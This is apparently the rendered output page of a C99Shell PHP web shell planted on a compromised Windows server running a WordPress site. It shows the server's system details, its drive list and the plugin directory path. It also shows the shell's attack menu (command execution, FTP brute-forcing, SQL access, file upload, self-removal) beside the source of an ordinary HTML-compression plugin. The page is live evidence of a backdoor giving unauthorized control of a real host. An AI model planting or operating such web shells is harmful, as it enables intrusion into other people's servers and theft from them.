!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wp-html-compression\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     wp-html-compression.php (1.13 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
Plugin Name: WP-HTML-Compression
Plugin URI: http://www.svachon.com/blog/html-minify/
Description: Reduce file size by shortening URLs and safely removing all standard comments and unnecessary whitespace from an HTML document.
Version: 0.5.8
Author: Steven Vachon
Author URI: http://www.svachon.com/
Author Email: contact@svachon.com
*/

require_once 'libs/html-minify.php';

$wp_html_compression_run false;



function 
wp_html_compression_start()
{
    global 
$wp_html_compression_run;
    
    if (!
$wp_html_compression_run)
    {
        
$wp_html_compression_run true;
        
        
// "Humans TXT" plugin support
        
$is_humans = (!function_exists('is_humans')) ? false is_humans();
        
        if (!
$is_humans && !is_feed() && !is_robots())
        {
            
ob_start('html_minify_buffer');
        }
    }
}



// Prevents errors when this file is accessed directly
if (function_exists('is_admin'))
{
    if (!
is_admin())
    {
        
add_action('template_redirect''wp_html_compression_start', -1);
        
        
// In case above fails (it does sometimes.. ??)
        
add_action('get_header''wp_html_compression_start');
    }
    else
    {
        
// For v0.6
        //require_once dirname(__FILE__) . '/admin.php';
    
}
}



?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--